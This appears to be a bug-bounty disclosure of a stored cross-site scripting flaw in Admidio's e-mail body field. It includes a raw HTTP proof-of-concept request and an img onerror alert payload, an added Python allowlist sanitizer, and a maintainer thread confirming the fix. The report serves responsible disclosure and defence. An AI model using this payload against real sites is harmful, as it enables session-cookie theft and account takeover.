Cross-site Scripting (XSS) - Stored in admidio/admidio

Valid

Reported on

Sep 28th 2021


Description

Stored XSS in parameter 'msg_body' at 'Write e-mail' allows for the arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo/adm_program/modules/messages/messages_send.php HTTP/2
Host: www.admidio.org
Cookie: ADMIDIO_DEMO_d00c3e23_demo_SESSION_ID=93c01fc78b67c3dd8e8ce86ae139a396; ADMIDIO_DEMO_d00c3e23_demo_cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23765900513111934937891624423
Content-Length: 720
Origin: https://www.admidio.org
Referer: https://www.admidio.org/demo/adm_program/modules/messages/messages_write.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="msg_to[]"

groupID: 4
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="subject"

test
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1048576
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="msg_body"

<p>&lt;iMg SrC=&quot;x&quot; oNeRRor=&quot;alert(1);&quot;&gt;</p>

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="btn_send"


-----------------------------23765900513111934937891624423--

Steps to Reproduce

Go to News > Write e-mail

In the body input, enter the payload: <iMg SrC="x" oNeRRor="alert(1);">

The XSS triggers when the e-mail detail view is opened.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
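As an added example, not Admidio's own code (which is PHP), the following minimal allowlist sanitizer in Python shows the defensive property the fix needs: tag and attribute names are compared case-insensitively, so the mixed-case iMg/oNeRRor payload from the PoC loses its event handler, and entity-encoded text stays inert text instead of being decoded into live markup. The allowlist and the safe-scheme set are constructed for the illustration.

```python
import html
from html.parser import HTMLParser

# Constructed allowlist for a message body: basic formatting plus <a href> and <img src>.
ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def _safe_url(value: str) -> bool:
    """Accept relative URLs and http/https/mailto; reject javascript:, data:, etc."""
    compact = "".join(value.lower().split())  # drop whitespace browsers ignore inside a scheme
    scheme, has_colon, _ = compact.partition(":")
    return not has_colon or scheme in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Re-serialises only allowlisted tags/attributes; everything else is dropped or escaped."""

    def __init__(self):
        # convert_charrefs=True hands us decoded text, which handle_data re-escapes,
        # so an entity-encoded payload is never turned into markup on output.
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases names, so iMg/oNeRRor are matched as img/onerror.
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* event handler, style, etc.
            if name in ("href", "src") and not _safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text (including decoded entities and <script> bodies) is escaped, never emitted raw.
        self.out.append(html.escape(data, quote=False))


def sanitize(body: str) -> str:
    """Return a sanitized copy of an untrusted HTML message body."""
    s = AllowlistSanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out)
```

Running `sanitize('<p><iMg SrC="x" oNeRRor="alert(1);"></p>')` yields `<p><img src="x"></p>`, while the entity-encoded form submitted in the PoC is preserved as escaped text.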

We have contacted a member of the admidio team and are waiting to hear back 4 months ago
admidio/admidio maintainer validated this vulnerability 4 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
admidio/admidio maintainer
4 months ago

Maintainer


The problem is solved within the current master. If I solve the CSRF within the forms we will release version 4.1 which will address this issue.

lethanhphuc
4 months ago

Researcher


Okay. I am waiting for the new version from you.

Markus Faßbender confirmed that a fix has been merged on eec453 18 days ago
Markus Faßbender has been awarded the fix bounty
Markus
18 days ago

Maintainer


Thanks for the research.